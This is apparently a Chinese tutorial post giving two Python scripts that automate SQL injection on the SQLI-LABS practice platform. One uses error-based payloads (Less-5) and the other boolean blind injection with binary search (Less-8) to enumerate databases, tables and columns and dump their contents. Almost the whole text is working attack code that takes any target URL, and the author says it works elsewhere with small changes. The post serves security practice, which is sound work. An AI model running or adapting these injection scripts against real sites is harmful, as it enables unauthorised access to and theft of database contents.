通过前面payload的构造,不难发现,对于报错型注入和布尔注入(sql盲注)纯手工注入的效率是非常慢的。这些payload语句虽然复杂,但大部分内容都是相同的,因此,一言不合就写了个脚本自动化注入,坐等信息爆出的感觉–>我就静静看着不说话_<–
以下两个python脚本仅适用于SQLI-LABS,在其他平台使用还需要做少许改动~~~
*** SQLI-LABS 是一个专业的SQL注入练习平台**
基于报错型注入的自动化脚本(sqli-labs-master/Less-5/)
#!/usr/bin/env python
#coding=utf-8
import sys
import requests
import re
import binascii
#sys.argv[1]
# --dbs url
# --tables -D database url
# --columns -T tablename -D database url
# --dump -C columnname -T tablename -D database url
def http_get(url):
# proxies = {'http': 'http://127.0.0.1:8080'}
#return requests.get(dbs_num_url, proxies=proxies)
return requests.get(url)
def getAllDatabases(url):
dbs_num_url = url + "'+and(select 1 from(select count(*),concat((select (select (select concat(0x7e7e3a7e7e, count(distinct+table_schema),0x7e7e3a7e7e) from information_schema.tables)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)--+ "
resp = http_get(dbs_num_url)
html = resp.content
#print html
# ~~:~~4~~:~~
dbs_num = int(re.search(r'~~:~~(\d*?)~~:~~', html).group(1))
print (u"数据库数量: %d" % dbs_num)
dbs = []
print (u"数据库名: ")
for index in xrange(0,dbs_num):
db_name_url = url + "'+and(select 1 from(select count(*),concat((select (select (select distinct concat(0x7e7e3a7e7e, table_schema, 0x7e7e3a7e7e) from information_schema.tables limit %d,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)--+" % index
html = http_get(db_name_url).content
db_name = re.search(r'~~:~~(.*?)~~:~~', html).group(1)
dbs.append(db_name)
print ("\t%s" % db_name)
def getAllTablesByDb(url, db_name):
db_name_hex = "0x" + binascii.b2a_hex(db_name)
tables_num_url = url + "'+and(select 1 from(select count(*),concat((select (select ( select concat(0x7e7e3a7e7e, count(table_name), 0x7e7e3a7e7e) from information_schema.tables where table_schema=%s)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)--+" % db_name_hex
html = http_get(tables_num_url).content
tables_num = int(re.search(r'~~:~~(\d*?)~~:~~', html).group(1))
print (u"%s 库中,表的数量: %d" % (db_name, tables_num))
print (u"表名: ")
for index in xrange(0,tables_num):
tables_name_url = url + "'+and(select 1 from(select count(*),concat((select (select ( select concat(0x7e7e3a7e7e, table_name, 0x7e7e3a7e7e) from information_schema.tables where table_schema=%s limit %d,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)--+" % (db_name_hex, index)
html = http_get(tables_name_url).content
table_name = re.search(r'~~:~~(.*?)~~:~~', html).group(1)
print ("\t%s" % table_name)
def getAllColumnsByTable(url, db_name,tab_name):
db_name_hex = "0x" + binascii.b2a_hex(db_name)
tab_name_hex = "0x" + binascii.b2a_hex(tab_name)
column_num_url = url + "' and (select 1 from (select count(*),concat(0x3a,0x3a,(select count(column_name) from information_schema.columns where table_schema=%s and table_name=%s),0x3a,0x3a, floor(rand(0)*2)) a from information_schema.columns group by a)s) --+" % (db_name_hex,tab_name_hex)
html = http_get(column_num_url).content
column_num = int(re.search(r'::(\d*?)::', html).group(1))
print (u"%s 表中,字段的数量: %d" % (tab_name, column_num))
print (u"列名:")
for index in xrange(0,column_num):
tables_name_url = url + "' and (select 1 from (select count(*),concat(0x3a,0x3a,(select column_name from information_schema.columns where table_schema=%s and table_name=%s limit %d,1),0x3a,0x3a, floor(rand(0)*2)) a from information_schema.columns group by a)s) --+" % (db_name_hex,tab_name_hex,index)
html = http_get(tables_name_url).content
column_name = re.search(r'::(.*?)::', html).group(1)
print ("\t%s" % column_name)
pass
def getAllContent(url, db_name, tab_name, col_name,):
# db_name_hex = "0x" + binascii.b2a_hex(db_name)
# tab_name_hex = "0x" + binascii.b2a_hex(tab_name)
# col_name = binascii.b2a_hex(col_name)
# col = re.split(",",col_name) #分割参数:字段名
# le = len(col)
content_num_url = url + "' and (select 1 from (select count(*),concat(0x3a,0x3a,(select count(*) from %s.%s),0x3a,0x3a,floor(rand(0)*2)) a from information_schema.columns group by a)s) --+" % (db_name,tab_name)
html = http_get(content_num_url).content
col_name_re = col_name.replace(',',',0x09,')
content_num = int(re.search(r'::(\d*?)::', html).group(1))
print "%s 表中,行数为: %d" % (tab_name, content_num)
for index in xrange(0,content_num):
content_name_url = url + "' and (select 1 from (select count(*),concat((select concat(0x3a,0x3a,%s,0x3a,0x3a) from %s.%s limit %d,1), floor(rand(0)*2)) a from information_schema.columns group by a)s) --+" % (col_name_re,db_name,tab_name,index)
html = http_get(content_name_url).content
# print htmlsss
content_name = re.search(r'::(.*?)::', html).group(1)
print "\t%s" % content_name
def main():
if sys.argv[1] == '--dbs':
getAllDatabases(sys.argv[2])
elif sys.argv[1] == '--tables':
getAllTablesByDb(sys.argv[4], sys.argv[3])
elif sys.argv[1] == '--columns':
# print sys.argv[6],sys.argv[5],sys.argv[3]
getAllColumnsByTable(sys.argv[6],sys.argv[5],sys.argv[3])
pass
elif sys.argv[1] == '--dump':
getAllContent(sys.argv[8], sys.argv[7], sys.argv[5], sys.argv[3])
# print sys.argv[8], sys.argv[7], sys.argv[5], sys.argv[3]
pass
else:
print (u"我不懂你的参数!")
if __name__ == '__main__':
main()
基于bool型注入(sql盲注)的自动化脚本(sqli-labs-master/Less-8/)
#!/usr/bin/env python
#coding=utf-8
import sys
import requests
import re
import binascii
#sys.argv[1]
# --dbs url
# --tables url -D database
# --columns url -D database -T tablename
# --dump url -D database -T tablename -C columnname
def http_get(url):
return requests.get(url)
pass
def dichotomy(sql): #二分法
left = 1
right = 500
while 1:
mid = (left + right)/2
# print mid
if mid == left:
return mid
break
db_count_url = sql + "%d)--+" % mid
# print db_count_url
html = http_get(db_count_url).content
# print html
search_flag = re.search("You are in", html)
if search_flag:
right = mid
# print "right:" + str(right)
else:
left = mid
# print "left:" + str(left)
def getAllDabatases(url):
search_db_num =url + "' and ((select count(schema_name) from information_schema.schemata) < " #查看数据库总个数
num = dichotomy(search_db_num)
# print num
print ("\t" + u"数据库个数: %d" % num)
for x in xrange(0,num):
search_db_len = url + "' and ((select length(schema_name) from information_schema.schemata limit %d,1) < " % x #看某个数据库名的长度
db_len = dichotomy(search_db_len)
print (u"第%d个数据库名的长度: %d" % (x+1,db_len))
db_name = ''
for n in xrange(1,db_len+1):
search_db_name = url + "' and ((select ascii(substr((select schema_name from information_schema.schemata limit %d,1),%d,1))) < " % (x,n) #查看某个数据库名
db_name1 = chr(dichotomy(search_db_name))
# print search_db_name
db_name = db_name + db_name1
print "\t" + db_name
def getAlltablesByDb(url, db_name):
db_name_hex = "0x" + binascii.b2a_hex(db_name)
search_tab_num = url + "' and ((select count(distinct+table_name) from information_schema.tables where table_schema=%s ) < " % db_name_hex
num = dichotomy(search_tab_num)
# print search_tab_num
print ("\t" + u"表的个数: %d" % num)
for x in xrange(0,num):
search_tab_len = url + "' and ((select length(table_name) from information_schema.tables where table_schema=%s limit %d,1) < " % (db_name_hex,x) #查看某个表名的长度
tab_len = dichotomy(search_tab_len)
print (u"第%d个表名的长度: %d" % (x+1,tab_len))
tab_name = ''
for n in xrange(1,tab_len+1):
search_tab_name = url + "' and ((select ascii(substr((select table_name from information_schema.tables where table_schema=%s limit %d,1),%d,1))) < " % (db_name_hex,x,n) #查看某个表名
tab_name1 = chr(dichotomy(search_tab_name))
# print search_db_name
tab_name = tab_name + tab_name1
print "\t" + tab_name
def getAllcolumnsByTable(url, db_name, tab_name):
db_name_hex = "0x" + binascii.b2a_hex(db_name)
tab_name_hex = "0x" + binascii.b2a_hex(tab_name)
search_column_num = url + "' and ((select count(distinct+column_name) from information_schema.columns where table_schema=%s and table_name=%s ) < " % (db_name_hex,tab_name_hex)
num = dichotomy(search_column_num)
print search_column_num
print ("\t" + u"表中字段的个数: %d" % num)
for x in xrange(0,num):
search_column_len = url + "' and ((select length(column_name) from information_schema.columns where table_schema=%s and table_name=%s limit %d,1) < " % (db_name_hex,tab_name_hex,x) #查看某个字段名的长度
column_len = dichotomy(search_column_len)
print (u"第%d个字段名的长度: %d" % (x+1,column_len))
column_name = ''
for n in xrange(1,column_len+1):
search_column_name = url + "' and ((select ascii(substr((select column_name from information_schema.columns where table_schema=%s and table_name=%s limit %d,1),%d,1))) < " % (db_name_hex,tab_name_hex,x,n) #查看某个字段名
column_name1 = chr(dichotomy(search_column_name))
# print search_db_name
column_name = column_name + column_name1
print "\t" + column_name
def getAllcontent(url, db_name, tab_name, col_name):
col_name_hex = "0x" + binascii.b2a_hex(col_name)
search_content_num = url + "' and ((select count(*) from %s.%s ) < " % (db_name,tab_name)
num = dichotomy(search_content_num)
# print search_content_num
print ("\t" + u"表中的行数为:: %d" % num)
c_num =col_name.split(',') #传入的字段个数
c = len(c_num)
for x in xrange(0,num):
print "第%d行:"% (x+1)
for y in xrange(0,c):
search_content_len = url + "' and ((select length(%s) from %s.%s limit %d,1) < " % (c_num[y],db_name,tab_name,x) #查看某个字段对应内容的长度
content_len = dichotomy(search_content_len)
print (u"\t第%d个字段对应内容的长度: %d" % (y+1,content_len))
content_name = ''
for n in xrange(1,content_len+1):
search_content_name = url + "' and ((select ascii(substr((select %s from %s.%s limit %d,1),%d,1))) < " % (c_num[y],db_name,tab_name,x,n) #查看某个字段名对应内容
content_name1 = chr(dichotomy(search_content_name))
# print search_db_name
content_name = content_name + content_name1
print "\t%s" % c_num[y] + ':\t' + content_name
def main():
if sys.argv[1]=='--dbs':
getAllDabatases(sys.argv[2])
elif sys.argv[1]=='--tables':
getAlltablesByDb(sys.argv[2],sys.argv[4])
elif sys.argv[1]=='--columns':
getAllcolumnsByTable(sys.argv[2],sys.argv[4],sys.argv[6])
elif sys.argv[1]=='--dump':
getAllcontent(sys.argv[2],sys.argv[4],sys.argv[6],sys.argv[8],)
pass
else:
print '我不懂你的参数!'
if __name__ == '__main__':
main()